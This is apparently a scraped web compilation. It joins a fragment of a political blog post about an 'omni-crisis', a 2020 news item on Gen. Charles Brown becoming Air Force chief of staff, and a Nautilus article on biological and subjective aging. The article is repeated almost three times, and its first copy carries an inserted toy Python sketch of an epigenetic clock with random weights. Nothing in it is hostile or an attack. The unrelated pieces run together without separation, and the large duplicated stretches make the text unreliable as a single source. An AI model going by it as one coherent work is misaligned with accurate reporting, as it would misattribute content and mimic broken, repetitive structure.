Let’s be clear. Responsibility is not equal. The omni-crisis drags on because there is little desire or ability on the part of authorities to resolve the confusion prolonged disruption generates. Their actions are negligent or irresponsible at best. At worst, they are deliberately malicious and hateful. Much more can and should be said about this. But the overriding message of this post is that the omni-crisis has significantly enlarged the space of possible outcomes beyond that normally considered day-to-day by most Americans. And it is not clear how many people in positions of influence and authority recognize this at all. They cheer on their favored factions and issue inflammatory declarations and demands. Do they know there are dragons where we are going? And, more disturbingly, do they even care?
title: US Air Force Gen. Charles Brown makes history by becoming the first Black officer to lead a military branch
image: http://www.africanewspay.com/wp-content/uploads/2020/06/IMG_20200612_005230.png
Gen. Charles Brown, Jr. was confirmed by the Senate as the next Air Force chief of staff. He will be the first African American to serve as leader of one of the uniformed military branches.
Brown, a distinguished airman and the current commander of US Pacific Air Forces, has served the Air Force for 35 years, during which time he has held a number of important commands and flown combat missions.
His confirmation comes at a time of nationwide unrest over racial injustice, a subject the general spoke passionately about last week in a powerful video message.
The Senate unanimously confirmed Gen. Charles “CQ” Brown Jr. as the next Air Force chief of staff on Tuesday. He will be the first African American airman to serve as a military service chief, making the general’s confirmation a historic achievement.
Brown, the current commander of US Pacific Air Forces, was nominated by the president to be the 22nd Air Force chief of staff on March 2.
Commissioned after graduating from Texas Tech University in 1984, Brown has served the Air Force for 35 years.
The distinguished four-star general has nearly 3,000 flying hours, including 130 combat hours, primarily in F-16 Fighting Falcons. Brown has commanded a fighter squadron, two fighter wings, and US Air Forces Central Command. He has also served as the deputy commander for US Central Command, according to his Air Force biography.
“CQ Brown is one of the finest warriors our Air Force has ever produced,” Gen. Dave Goldfein, the current Air Force chief of staff who is set to retire at the end of the month, said after Brown’s nomination. “He’s led worldwide – in the Pacific, Europe, the Middle East and Africa. When it comes to global, operational savvy there’s nobody stronger.”
Speaking before the Senate Armed Services Committee early last month, Brown said that he was committed to seeing the Air Force achieve “irreversible momentum towards the implementation of the National Defence Strategy and an integrated and more lethal joint force.”
Responding to Brown’s confirmation Tuesday, President Donald Trump tweeted that he was looking forward to working with the general, characterising him as “a Patriot and Great Leader.”
Source: https://www.businessinsider.com.au/charles-brown-confirmed-air-force-chief-of-staff-2020-6/amp
title: Why You Can’t Help But Act Your Age - Aging on Nautilus
author: Anil Ananthaswamy
description: In 1979, psychologist Ellen Langer and her students carefully refurbished an old monastery in Peterborough, New Hampshire, to resemble a place that would have existed two decades earlier. They invited…
image: http://nautilus-vertical.s3.amazonaws.com/aging_0x0_476x316_a-218.png
In 1979, psychologist Ellen Langer and her students carefully refurbished an old monastery in Peterborough, New Hampshire, to resemble a place that would have existed two decades earlier. They invited a group of elderly men in their late 70s and early 80s to spend a week with them and live as they did in 1959, “a time when an IBM computer filled a whole room and panty hose had just been introduced to U.S. women,” Langer wrote. Her idea was to return the men, at least in their minds, to a time when they were younger and healthier—and to see if it had physiological consequences.
Every day Langer and her students met with the men to discuss “current” events. They talked about the first United States satellite launch, Fidel Castro entering Havana after his march across Cuba, and the Baltimore Colts winning the NFL championship game. They discussed “current” books: Ian Fleming’s Goldfinger and Leon Uris’ Exodus. They watched Ed Sullivan and Jack Benny and Jackie Gleason on a black-and-white TV, listened to Nat King Cole on the radio, and saw Marilyn Monroe in Some Like It Hot. Everything was transporting the men back to 1959.
When Langer studied the men after a week of such sensory and mindful immersion in the past, she found that their memory, vision, hearing, and even physical strength had improved. She compared the traits to those of a control group of men, who had also spent a week in a retreat. The control group, however, had been told the experiment was about reminiscing. They were not told to live as if it were 1959. The first group, in a very objective sense, seemed younger. The team took photographs of the men before and after the experiment, and people who knew nothing about the study said the men looked younger in the after-pictures, says Langer, who today is a professor of psychology at Harvard University.
IN THE YEAR 1959: A psychology experiment that took seniors back to a time when they were young—1959, to be exact, evoked by the images above—revealed that living as they did in 1959 improved their memory, vision, and hearing. Clockwise: Robert Riger / Getty Images; Wikipedia; Wikipedia; Luis Korda / Wikipedia; Wikipedia; Wikipedia
Langer’s experiment was a tantalizing demonstration that our chronological age based on our birthdate is a misleading indicator of aging. Langer, of course, was tackling the role of the mind in how old we feel and act. Since her study, others have taken a more objective look at the aging body. The goal is to determine an individual’s “biological age,” a term that aims to capture the body’s physiological development and decline with time, and predict, with reasonable accuracy, the risks of disease and death. As scientists have worked to pinpoint a person’s biological age, they have learned that organs and tissues often age differently, making it difficult to reduce biological age to a single number. They have also made a discovery that echoes Langer’s work. How old we feel—our subjective age—can influence how we age. Where age is concerned, the pages torn off a calendar do not tell the whole story.
While we intuitively know what it means to grow old, precise definitions of aging haven’t been easy to come by. In 1956, British gerontologist and author Alex Comfort (later famous for writing The Joy of Sex) memorably defined senescence as “a decrease in viability and an increase in vulnerability.” Any given individual, he wrote, would die from “randomly distributed causes.” Evolutionary biologists think of aging as something that reduces our ability to survive and reproduce because of “internal physiological deterioration.” Such deterioration, in turn, can be understood in terms of cellular functions: The older the cells in an organ, the more likely they are to stop dividing and die, or develop mutations that lead to cancer. This leads us to the idea that our bodies may have a true biological age.
The road to determining that age, though, has not been a straight one. One approach is to look for so-called biomarkers of aging, something that’s changing in the body and can be used as a predictor of the likelihood of being struck by age-related diseases or of how much longer one has left to live. An obvious set of biomarkers could be attributes like blood pressure or body weight. Both tend to go up as the body ages. But they are unreliable. Blood pressure can be affected by medication, body weight depends on lifestyle and diet, and there are certainly people who don’t gain weight as they age.
Where age is concerned, the pages torn off a calendar do not tell the whole story.
In the 1990s, one promising biomarker stood out: stretches of DNA called telomeres. They appear at the ends of chromosomes, serving as caps that protect the chromosomes from fraying. Telomeres have often been likened to the plastic tips that similarly protect shoelaces. It turns out that telomeres themselves get shorter and shorter each time a cell divides. And when the telomere shortens beyond a point, the cell dies. There’s a strong relationship between telomere length and health and diseases, such as cancer and atherosclerosis.
But despite a range of studies trying to find such a link, it’s been hard to make the case for telomeres as accurate biomarkers of aging. In 2013, Anne Newman, director of the Center for Aging and Population Health at the University of Pittsburgh, and her student Jason Sanders reviewed the existing literature on telomeres and concluded that “if telomere length is a biomarker of human aging, it is a weak biomarker with poor predictive accuracy.”
“Twenty years ago, people had high hopes that telomere length could actually explain aging, as in biological aging. There was a hope that it would be the root cause of aging,” says Steve Horvath, a geneticist and biostatistician at the University of California, Los Angeles. “Now we know that that’s simply not the case. In the last 10 to 15 years, people realized that there must be other mechanisms that play an important role in aging.”
Attention shifted to how fast stem cells are being depleted in the body, or the efficacy of mitochondria (the organelles inside our cells that produce the energy needed for cells to function). Horvath scoured the data for reliable markers, looking at, for example, levels of gene expression for any strong correlations to aging. He found none.
But that didn’t mean there weren’t reliable biomarkers. There was one set of data Horvath had been studiously avoiding. This had to do with DNA methylation, a process cells use to switch off genes. Methylation mainly involves the addition of a so-called methyl group to cytosine, one of the four main bases that make up strands of DNA. Because DNA methylation does not alter the core genetic sequence, but rather modifies gene expression externally, the process is called epigenetics.
EPIGENETIC CLOCK: UCLA geneticist Steve Horvath (above) identified methylation levels on the human genome that serve as remarkable signs of biological aging. “I had never seen anything like it,” he says. “It’s a cliché, but it really was a smoking gun.” Courtesy of Steve Horvath
Horvath didn’t think that epigenetics would have anything to do with aging. “I had data sitting there and I would not really touch them, because I thought there was no meaning in it anyway,” he says.
But some time in 2009, Horvath gave in and analyzed a dataset of methylation levels at 27,000 locations on the human genome—an analysis “you can do in an hour,” he says. Nothing in his 10 years of analyzing genomic datasets had prepared him for the results. “I had never seen anything like it,” he says. “It’s a cliché, but it really was a smoking gun.”
Because their minds were taken back to a time when they were younger, their bodies went back too.
After a few more years of “labor intensive” work, Horvath identified 353 special sites on the human genome that were present in cells in every tissue and organ. Horvath developed an algorithm that used the methylation levels at these 353 sites—regardless of the cell type—to establish an epigenetic clock. His algorithm took into account that in some of these 353 sites, the methylation levels decreased with age, while in others they increased.
In 2013, Horvath published the results of his analysis of 8,000 samples taken from 51 types of healthy tissue and cells, and the conclusions were striking. When he calculated a single number for the biological age of the person based on the weighted average of the methylation levels at the 353 sites, he found that this number correlated well with the chronological age of the person (it was off by less than 3.6 years in 50 percent of the people—a far better correlation than has been obtained for any other biomarker). He also discovered that for middle-aged people and older, the epigenetic clock starts slowing down or speeding up—providing a way of telling whether someone is aging faster or slower than the calendar suggests.
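For readers who want a concrete picture of the arithmetic involved, here is a minimal sketch of the weighted-average idea described above. It is purely illustrative: the per-site weights, the intercept, and the sample methylation profile are all made up for demonstration, and Horvath’s actual clock uses coefficients fit to real data plus a calibration step that this toy omits.

```python
# Toy sketch of an epigenetic-clock estimate: a weighted average of
# methylation levels at 353 genomic sites, as described in the article.
# All numbers below are hypothetical placeholders, not Horvath's model.
import numpy as np

rng = np.random.default_rng(0)

N_SITES = 353                        # CpG sites used by the clock
weights = rng.normal(size=N_SITES)   # hypothetical per-site weights
intercept = 50.0                     # hypothetical baseline age

def epigenetic_age(methylation: np.ndarray) -> float:
    """Estimate biological age from methylation levels (values in [0, 1]).

    Positive weights push the estimate up as methylation at a site rises;
    negative weights push it down - matching the article's note that levels
    increase with age at some of the 353 sites and decrease at others.
    """
    return intercept + float(weights @ methylation)

# Example: a hypothetical methylation profile for one tissue sample.
sample = rng.uniform(0.0, 1.0, size=N_SITES)
print(f"estimated biological age: {epigenetic_age(sample):.1f} years")
```

Comparing this estimate with a person’s chronological age gives the deviation the article goes on to discuss: a negative difference suggests younger-than-expected tissue, a positive one suggests accelerated aging.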
Despite the correlation, Horvath says that biological age, rather than being for the whole body, is better applied to specific tissues and organs, whether it’s bone, blood, heart, lungs, muscles, or even the brain. The difference between the biological age and chronological age can be negative, zero, or positive. A negative deviation means that the tissue or organ is younger than expected; a zero indicates that the tissue is aging normally; and a positive deviation means the tissue or organ is older. Data show that different tissues can age at different rates.
In general, diseases speed up the epigenetic clock, and this is particularly striking in patients with Down’s syndrome or in those infected with HIV. In both cases, the tissues tend to age faster than normal. For instance, the blood and brain tissue in those infected with HIV show accelerated aging. Obesity causes the liver to age faster. And studies of people who died of Alzheimer’s disease show that the prefrontal cortex undergoes accelerated aging. Horvath also analyzed 6,000 samples of cancerous tissue and found that the epigenetic clock was ticking much faster in such cases, showing that the tissue had aged significantly more than the chronological age.
Despite this wealth of data, there is a gaping hole in our understanding of this striking correlation between methylation markers and biological age. “The biggest weakness of the epigenetic clock is that we just don’t understand the precise molecular mechanism behind it,” says Horvath. His speculation—and he stresses it’s just speculation—is that the epigenetic clock is related to what he calls the “epigenetic maintenance system,” molecular and enzymatic processes that maintain the epigenome and protect it from damage. “I feel that these markers are a footprint of that mechanism,” says Horvath. But “why is it so accurate? What pathway relates to it? That’s the biggest challenge right now,” he adds.
Even without understanding exactly how and why it works, the epigenetic clock gives researchers a tool to test the efficacy of anti-aging interventions that can potentially slow aging. “It’d be very exciting to develop a therapy that allows us to reset the epigenetic clock,” says Horvath.
While Horvath is thinking about hormonal treatments, Langer’s work with elderly men at the monastery in New Hampshire suggests that we can use the power of our mind to influence the body. Langer didn’t publish her results in a scientific journal in 1979. At the time, she didn’t have the resources to do a thorough study for the leading journals. “When you run a retreat over the course of five days, it’s very hard to control for everything,” Langer says. “Also, I didn’t have the funds to have, for instance, a vacationing control group. I could have published it in a second-rate journal, but I didn’t see any point to that. I wanted to get the information out there and I wrote it first in a book for Oxford University Press, so it was reviewed.”
Also, her argument that mind and body are one was potentially a little too path-breaking for the journals. “I think they were unlikely to buy the theoretical part of it,” she says. “The findings, improving vision and hearing in an elderly population, were so unusual that they were not going to rush to publish and stick their necks out.” Since then, Langer has pursued the mind-body connection and its effects on physiology and aging in rigorous studies that have been published in numerous scientific journals and books.
Traditionally, the mind-body problem refers to the difficulty of explaining how our ostensibly non-material mental states can affect the material body (clearly seen in the placebo effect). To Langer, the mind and body are one. “Wherever you put the mind you are necessarily putting the body,” she says.
So Langer began asking if subjective mental states could influence something as objective as the levels of blood sugar in patients with Type 2 diabetes. The 46 subjects in her study, all suffering from Type 2 diabetes, were asked to play computer games for 90 minutes. On their desk was a clock. They were asked to switch games every 15 minutes. The twist in the study was that for one-third of the subjects, the clock was ticking slower than real time, for one-third it was going faster, and for the last third, the clock was keeping real time.
Most of us are slaves to our chronological age.
“The question we were asking was would blood sugar level follow real or perceived time,” says Langer. “And the answer is perceived time.” This was a striking illustration of psychological processes—in this case the subjective perception of time—influencing metabolic processes in the body that control the level of blood sugar.
Although Langer did not explore a connection between the mind and epigenetic changes, other studies suggest such a link. In 2013, Richard Davidson of the University of Wisconsin at Madison and his colleagues reported that even one day of mindfulness meditation can impact the expression of genes. In their study, 19 experienced meditators were studied before and after a full day of intensive meditation. For control, the researchers similarly studied a group of 21 people who engaged in a full day of leisure. At the end of the day, the meditators showed lowered levels of activity of inflammatory genes—exactly the kind of effect seen when one takes anti-inflammatory drugs. The study also showed lowered activity of genes that are involved in epigenetically controlling expressions of other genes. The state of one’s mind, it seems, can have an epigenetic effect.
Such studies taken together provide clues as to why the week-long retreat in New Hampshire reversed some of the age-related attributes in elderly men. Because their minds were taken back to a time when they were younger, their bodies too went back to that earlier time, bringing about some of the physiological changes that resulted in improved hearing or grip strength.
But it’s important to point out that biological aging is an inexorable process—and there comes a time when no amount of thinking positive thoughts can halt aging. If body and mind are one and the same—as Langer suggests—then an aging body and aging mind go hand-in-hand, limiting our ability to influence physiological decline with psychological deftness.
Still, Langer thinks that how we age has a lot to do with our perceptions of what aging means—often reinforced by culture and society. “Whether it’s about aging or anything else, if you are surrounded by people who have certain expectations for you, you tend to meet those expectations, positive or negative,” says Langer.
Most of us are slaves to our chronological age, behaving, as the saying goes, age-appropriately. For example, young people often take steps to recover from a minor injury, whereas someone in their 80s may accept the pain that comes with the injury and be less proactive in addressing the problem. “Many people, because of societal expectations, all too often say, ‘Well, what do you expect, as you get older you fall apart,’ ” says Langer. “So, they don’t do the things to make themselves better, and it becomes a self-fulfilling prophecy.”
It’s this perception of one’s age, or subjective age, that interests Antonio Terracciano, a psychologist and gerontologist at Florida State University College of Medicine. Horvath’s work shows that biological age is correlated with diseases. Can one say the same thing about subjective age?
People’s perception of their own age can differ markedly from person to person. People between the ages of 40 and 80, for example, tend to think they are younger. People who are 60 may say that they feel like they are 50 or 55, or sometimes even 45. Rarely will they say they feel older. However, people in their 20s often perceive their age to be the same as their chronological age, and may say they feel somewhat older.
Terracciano and colleagues have found that subjective age correlates with certain physiological markers of aging, such as grip strength, walking speed, lung capacity, and even the levels of C-reactive protein in the blood, an indication of inflammation in the body. The younger you feel you are, the better are these indicators of age and health: You walk faster, have better grip strength and lung capacity, and less inflammation.
Subjective age affects cognition and is an indicator of the likelihood of developing dementia. Terracciano and colleagues looked at data collected from 5,748 people aged 65 or older. The subjects’ cognitive abilities were evaluated to establish a baseline and they were then followed for a period of up to four years. The subjects were also asked about how old they felt at each instance. The researchers found that those who had a higher subjective age to start with were more likely to develop cognitive impairments and even dementia.
These correlation studies have limitations, however. For example, it’s possible that physically active people, who have better walking speed and lung capacity, and lower levels of C-reactive protein in their blood, naturally feel younger. How can one establish that our subjective age influences physiology and not the other way around?
That’s exactly what Yannick Stephan of the University of Grenoble in France and colleagues tried to find out. They recruited 49 adults, aged between 52 and 91, and divided them into an experimental and control group. Both groups were first asked their subjective age—how old they felt as opposed to their chronological age—and tested for grip strength to establish a baseline. The experimental group was told they had done better than 80 percent of people their age. The control group received no feedback. After this experimental manipulation, both groups were tested again for grip strength and asked about how old they felt. The experimental group reported feeling, on average, younger than their baseline subjective age. No such change was seen in the control group. Also, the experimental group showed an increase in grip strength, while the grip strength of the control decreased somewhat.
These correlations do not necessarily mean that feeling young causes better health. Terracciano’s next step is to correlate subjective age with quantitative biological markers of age. While no study has yet been done to find associations between the newly developed epigenetic markers and subjective age, Terracciano is keen to see if there are strong correlations.
Still, the message seems to be that our chronological age really is just a number. “If people think that because they are getting older they cannot do things, or cut their social ties, or incorporate this negative view which limits their life, that can be really detrimental,” says Terracciano. “Fighting those negative attitudes, challenging yourself, keeping an open mind, being engaged socially, can absolutely have a positive impact.”
Anil Ananthaswamy is an award-winning journalist and author. His first book, The Edge of Physics, was named Book of the Year in 2010 by PhysicsWorld. His second book, The Man Who Wasn’t There, was nominated for the PEN/E. O. Wilson Literary Science Writing Award. @AnilAnanth
In 1979, psychologist Ellen Langer and her students carefully refurbished an old monastery in Peterborough, New Hampshire, to resemble a place that would have existed two decades earlier. They invited a group of elderly men in their late 70s and early 80s to spend a week with them and live as they did in 1959, “a time when an IBM computer filled a whole room and panty hose had just been introduced to U.S. women,” Langer wrote. Her idea was to return the men, at least in their minds, to a time when they were younger and healthier—and to see if it had physiological consequences.
Every day Langer and her students met with the men to discuss “current” events. They talked about the first United States satellite launch, Fidel Castro entering Havana after his march across Cuba, and the Baltimore Colts winning the NFL championship game. They discussed “current” books: Ian Fleming’s Goldfinger and Leon Uris’ Exodus. They watched Ed Sullivan and Jack Benny and Jackie Gleason on a black-and-white TV, listened to Nat King Cole on the radio, and saw Marilyn Monroe in Some Like It Hot. Everything was transporting the men back to 1959.
When Langer studied the men after a week of such sensory and mindful immersion in the past, she found that their memory, vision, hearing, and even physical strength had improved. She compared the traits to those of a control group of men, who had also spent a week in a retreat. The control group, however, had been told the experiment was about reminiscing. They were not told to live as if it were 1959. The first group, in a very objective sense, seemed younger. The team took photographs of the men before and after the experiment, and people who knew nothing about the study said the men looked younger in the after-pictures, says Langer, who today is a professor of psychology at Harvard University.
IN THE YEAR 1959A psychology experiment that took seniors back to a time when they were young—1959, to be exact, evoked by the images above—revealed that living as they did in 1959 improved their memory, vision, and hearing.
Clockwise: Robert Riger / Getty Images; Wikipedia; Wikipedia; Luis Korda/ Wikipedia; Wikipedia; Wikipedia
Langer’s experiment was a tantalizing demonstration that our chronological age based on our birthdate is a misleading indicator of aging. Langer, of course, was tackling the role of the mind in how old we feel and act. Since her study, others have taken a more objective look at the aging body. The goal is to determine an individual’s “biological age,” a term that aims to capture the body’s physiological development and decline with time, and predict, with reasonable accuracy, the risks of disease and death. As scientists have worked to pinpoint a person’s biological age, they have learned that organs and tissues often age differently, making it difficult to reduce biological age to a single number. They have also made a discovery that echoes Langer’s work. How old we feel—our subjective age—can influence how we age. Where age is concerned, the pages torn off a calendar do not tell the whole story.
While we intuitively know what it means to grow old, precise definitions of aging haven’t been easy to come by. In 1956, British gerontologist and author Alex Comfort (later famous for writing The Joy of Sex) memorably defined senescence as “a decrease in viability and an increase in vulnerability.” Any given individual, he wrote, would die from “randomly distributed causes.” Evolutionary biologists think of aging as something that reduces our ability to survive and reproduce because of “internal physiological deterioration.” Such deterioration, in turn, can be understood in terms of cellular functions: The older the cells in an organ, the more likely they are to stop dividing and die, or develop mutations that lead to cancer. This leads us to the idea that our bodies may have a true biological age.
The road to determining that age, though, has not been a straight one. One approach is to look for so-called biomarkers of aging, something that’s changing in the body and can be used as a predictor of the likelihood of being struck by age-related diseases or of how much longer one has left to live. An obvious set of biomarkers could be attributes like blood pressure or body weight. Both tend to go up as the body ages. But they are unreliable. Blood pressure can be affected by medication and body weight depends on lifestyle and diet, and there are people who certainly don’t gain weight as they age.
Where age is concerned, the pages torn off calendar do not tell the whole story.
In the 1990s, one promising biomarker stood out: stretches of DNA called telomeres. They appear at the ends of chromosomes, serving as caps that protect the chromosomes from fraying. Telomeres have often been likened to the plastic tips that similarly protect shoelaces. It turns out that telomeres themselves get shorter and shorter each time a cell divides. And when the telomere shortens beyond a point, the cell dies. There’s a strong relationship between telomere length and health and diseases, such as cancer and atherosclerosis.
But despite a range of studies trying to find such a link, it’s been hard to make the case for telomeres as accurate biomarkers of aging. In 2013, Anne Newman, director of the Center for Aging and Population Health at the University of Pittsburgh, and her student Jason Sanders reviewed the existing literature on telomeres and concluded that “if telomere length is a biomarker of human aging, it is a weak biomarker with poor predictive accuracy.”
“Twenty years ago, people had high hopes that telomere length could actually explain aging, as in biological aging. There was a hope that it would be the root cause of aging,” says Steve Horvath, a geneticist and biostatistician at the University of California, Los Angeles. “Now we know that that’s simply not the case. In the last 10 to 15 years, people realized that there must be other mechanisms that play an important role in aging.”
Attention shifted to how fast stem cells are being depleted in the body, or the efficacy of mitochondria (the organelles inside our cells that produce the energy needed for cells to function). Horvath scoured the data for reliable markers, looking at, for example, levels of gene expression for any strong correlations to aging. He found none.
But that didn’t mean there weren’t reliable biomarkers. There was one set of data Horvath had been studiously avoiding. This had to do with DNA methylation, a process cells use to switch off genes. Methylation mainly involves the addition of a so-called methyl group to cytosine, one of the four main bases that make up strands of DNA. Because DNA methylation does not alter the core genetic sequence, but rather modifies gene expression externally, the process is called epigenetics.
EPIGENETIC CLOCKUCLA geneticist Steve Horvath (above) identified methylation levels on the human genome that serve as remarkable signs of biological aging. “I had never seen anything like it,” he says. “It’s a cliché, but it really was a smoking gun.”
Courtesy of Steve Horvath
Horvath didn’t think that epigenetics would have anything to do with aging. “I had data sitting there and I would not really touch them, because I thought there was no meaning in it anyway,” he says.
But some time in 2009, Horvath gave in and analyzed a dataset of methylation levels at 27,000 locations on the human genome—an analysis “you can do in an hour,” he says. Nothing in his 10 years of analyzing genomic datasets had prepared him for the results. “I had never seen anything like it,” he says. “It’s a cliché, but it really was a smoking gun.”
Because their minds were taken back to a time when they were younger, their bodies went back too.
After a few more years of “labor intensive” work, Horvath identified 353 special sites on the human genome that were present in cells in every tissue and organ. Horvath developed an algorithm that used the methylation levels at these 353 sites—regardless of the cell type—to establish an epigenetic clock. His algorithm took into account that in some of these 353 sites, the methylation levels decreased with age, while in others they increased.
In 2013, Horvath published the results of his analysis of 8,000 samples taken from 51 types of healthy tissue and cells, and the conclusions were striking. When he calculated a single number for the biological age of the person based on the weighted average of the methylation levels at the 353 sites, he found that this number correlated well with the chronological age of the person (it was off by less than 3.6 years in 50 percent of the people—a far better correlation than has been obtained for any other biomarker). He also discovered that for middle-aged people and older, the epigenetic clock starts slowing down or speeding up—providing a way of telling whether someone is aging faster or slower than the calendar suggests.
Despite the correlation, Horvath says that biological age, rather than being for the whole body, is better applied to specific tissues and organs, whether it’s bone, blood, heart, lungs, muscles, or even the brain. The difference between the biological age and chronological age can be negative, zero, or positive. A negative deviation means that the tissue or organ is younger than expected; a zero indicates that the tissue is aging normally; and a positive deviation means the tissue or organ is older. Data show that different tissues can age at different rates.
In general, diseases speed up the epigenetic clock, and this is particularly striking in patients with Down’s syndrome or in those infected with HIV. In both cases, the tissues tend to age faster than normal. For instance, the blood and brain tissue in those infected with HIV show accelerated aging. Obesity causes the liver to age faster. And studies of people who died of Alzheimer’s disease show that the prefrontal cortex undergoes accelerated aging. Horvath also analyzed 6,000 samples of cancerous tissue and found that the epigenetic clock was ticking much faster in such cases, showing that the tissue had aged significantly more than the chronological age.
Despite this wealth of data, there is a gaping hole in our understanding of this striking correlation between methylation markers and biological age. “The biggest weakness of the epigenetic clock is that we just don’t understand the precise molecular mechanism behind it,” says Horvath. His speculation—and he stresses it’s just speculation—is that the epigenetic clock is related to what he calls the “epigenetic maintenance system,” molecular and enzymatic processes that maintain the epigenome and protect it from damage. “I feel that these markers are a footprint of that mechanism,” says Horvath. But “why is it so accurate? What pathway relates to it? That’s the biggest challenge right now,” he adds.
Even without understanding exactly how and why it works, the epigenetic clock gives researchers a tool to test the efficacy of anti-aging interventions that can potentially slow aging. “It’d be very exciting to develop a therapy that allows us to reset the epigenetic clock,” says Horvath.
While Horvath is thinking about hormonal treatments, Langer’s work with elderly men at the monastery in New Hampshire suggests that we can use the power of our mind to influence the body. Langer didn’t publish her results in a scientific journal in 1979. At the time, she didn’t have the resources to do a thorough study for the leading journals. “When you run a retreat over the course of five days, it’s very hard to control for everything,” Langer says. “Also, I didn’t have the funds to have, for instance, a vacationing control group. I could have published it in a second-rate journal, but I didn’t see any point to that. I wanted to get the information out there and I wrote it first in a book for Oxford University Press, so it was reviewed.”
Also, her argument that mind and body are one was potentially a little too path-breaking for the journals. “I think they were unlikely to buy the theoretical part of it,” she says. “The findings, improving vision and hearing in an elderly population, were so unusual that they were not going to rush to publish and stick their necks out.” Since then, Langer has pursued the mind-body connection and its effects on physiology and aging in rigorous studies that have been published in numerous scientific journals and books.
Traditionally, the mind-body problem refers to the difficulty of explaining how our ostensibly non-material mental states can affect the material body (clearly seen in the placebo effect). To Langer, the mind and body are one. “Wherever you put the mind you are necessarily putting the body,” she says.
So Langer began asking if subjective mental states could influence something as objective as the levels of blood sugar in patients with Type 2 diabetes. The 46 subjects in her study, all suffering from Type 2 diabetes, were asked to play computer games for 90 minutes. On their desk was a clock. They were asked to switch games every 15 minutes. The twist in the study was that for one-third of the subjects, the clock was ticking slower than real time, for one-third it was going faster, and for the last third, the clock was keeping real time.
Most of us are slaves to our chronological age.
“The question we were asking was would blood sugar level follow real or perceived time,” says Langer. “And the answer is perceived time.” This was a striking illustration of psychological processes—in this case the subjective perception of time—influencing metabolic processes in the body that control the level of blood sugar.
Although Langer did not explore a connection between the mind and epigenetic changes, other studies suggest such a link. In 2013, Richard Davidson of the University of Wisconsin at Madison and his colleagues reported that even one day of mindfulness meditation can impact the expression of genes. In their study, 19 experienced meditators were studied before and after a full day of intensive meditation. For control, the researchers similarly studied a group of 21 people who engaged in a full day of leisure. At the end of the day, the meditators showed lowered levels of activity of inflammatory genes—exactly the kind of effect seen when one takes anti-inflammatory drugs. The study also showed lowered activity of genes that are involved in epigenetically controlling expressions of other genes. The state of one’s mind, it seems, can have an epigenetic effect.
Such studies taken together provide clues as to why the week-long retreat in New Hampshire reversed some of the age-related attributes in elderly men. Because their minds were taken back to a time when they were younger, their bodies too went back to that earlier time, bringing about some of the physiological changes that resulted in improved hearing or grip strength.
But it’s important to point out that biological aging is an inexorable process—and there comes a time when no amount of thinking positive thoughts can halt aging. If body and mind are one and the same—as Langer suggests—then an aging body and aging mind go hand-in-hand, limiting our ability to influence physiological decline with psychological deftness.
Still, Langer thinks that how we age has a lot to do with our perceptions of what aging means—often reinforced by culture and society. “Whether it’s about aging or anything else, if you are surrounded by people who have certain expectations for you, you tend to meet those expectations, positive or negative,” says Langer.
Most of us are slaves to our chronological age, behaving, as the saying goes, age-appropriately. For example, young people often take steps to recover from a minor injury, whereas someone in their 80s may accept the pain that comes with the injury and be less proactive in addressing the problem. “Many people, because of societal expectations, all too often say, ‘Well, what do you expect, as you get older you fall apart,’ ” says Langer. “So, they don’t do the things to make themselves better, and it becomes a self-fulfilling prophecy.”
It’s this perception of one’s age, or subjective age, that interests Antonio Terracciano, a psychologist and gerontologist at Florida State University College of Medicine. Horvath’s work shows that biological age is correlated with diseases. Can one say the same thing about subjective age?
People’s perception of their own age can differ markedly from person to person. People between the ages of 40 and 80, for example, tend to think they are younger. People who are 60 may say that they feel like they are 50 or 55, or sometimes even 45. Rarely will they say they feel older. However, people in their 20s often perceive their age to be the same as their chronological age, and may say they feel somewhat older.
Terracciano and colleagues have found that subjective age correlates with certain physiological markers of aging, such as grip strength, walking speed, lung capacity, and even the levels of C-reactive protein in the blood, an indication of inflammation in the body. The younger you feel you are, the better are these indicators of age and health: You walk faster, have better grip strength and lung capacity, and less inflammation.
Subjective age affects cognition and is an indicator of the likelihood of developing dementia. Terracciano and colleagues looked at data collected from 5,748 people aged 65 or older. The subjects’ cognitive abilities were evaluated to establish a baseline and they were then followed for a period of up to four years. The subjects were also asked about how old they felt at each instance. The researchers found that those who had a higher subjective age to start with were more likely to develop cognitive impairments and even dementia.
These correlation studies have limitations, however. For example, it’s possible that physically active people, who have better walking speed and lung capacity, and lower levels of C-reactive protein in their blood, naturally feel younger. How can one establish that our subjective age influences physiology and not the other way around?
That’s exactly what Yannick Stephan of the University of Grenoble in France and colleagues tried to find out. They recruited 49 adults, aged between 52 and 91, and divided them into an experimental and control group. Both groups were first asked their subjective age—how old they felt as opposed to their chronological age—and tested for grip strength to establish a baseline. The experimental group was told they had done better than 80 percent of people their age. The control group received no feedback. After this experimental manipulation, both groups were tested again for grip strength and asked about how old they felt. The experimental group reported feeling, on average, younger than their baseline subjective age. No such change was seen in the control group. Also, the experimental group showed an increase in grip strength, while the grip strength of the control decreased somewhat.
These correlations do not necessarily mean that feeling young causes better health. Terracciano’s next step is to correlate subjective age with quantitative biological markers of age. While no study has yet been done to find associations between the newly developed epigenetic markers and subjective age, Terracciano is keen to see if there are strong correlations.
Still, the message seems to be that our chronological age really is just a number. “If people think that because they are getting older they cannot do things, or cut their social ties, or incorporate this negative view which limits their life, that can be really detrimental,” says Terracciano. “Fighting those negative attitudes, challenging yourself, keeping an open mind, being engaged socially, can absolutely have a positive impact.”
In 1979, psychologist Ellen Langer and her students carefully refurbished an old monastery in Peterborough, New Hampshire, to resemble a place that would have existed two decades earlier. They invited a group of elderly men in their late 70s and early 80s to spend a week with them and live as they did in 1959, “a time when an IBM computer filled a whole room and panty hose had just been introduced to U.S. women,” Langer wrote. Her idea was to return the men, at least in their minds, to a time when they were younger and healthier—and to see if it had physiological consequences.
Every day Langer and her students met with the men to discuss “current” events. They talked about the first United States satellite launch, Fidel Castro entering Havana after his march across Cuba, and the Baltimore Colts winning the NFL championship game. They discussed “current” books: Ian Fleming’s Goldfinger and Leon Uris’ Exodus. They watched Ed Sullivan and Jack Benny and Jackie Gleason on a black-and-white TV, listened to Nat King Cole on the radio, and saw Marilyn Monroe in Some Like It Hot. Everything was transporting the men back to 1959.
When Langer studied the men after a week of such sensory and mindful immersion in the past, she found that their memory, vision, hearing, and even physical strength had improved. She compared the traits to those of a control group of men, who had also spent a week in a retreat. The control group, however, had been told the experiment was about reminiscing. They were not told to live as if it were 1959. The first group, in a very objective sense, seemed younger. The team took photographs of the men before and after the experiment, and people who knew nothing about the study said the men looked younger in the after-pictures, says Langer, who today is a professor of psychology at Harvard University.
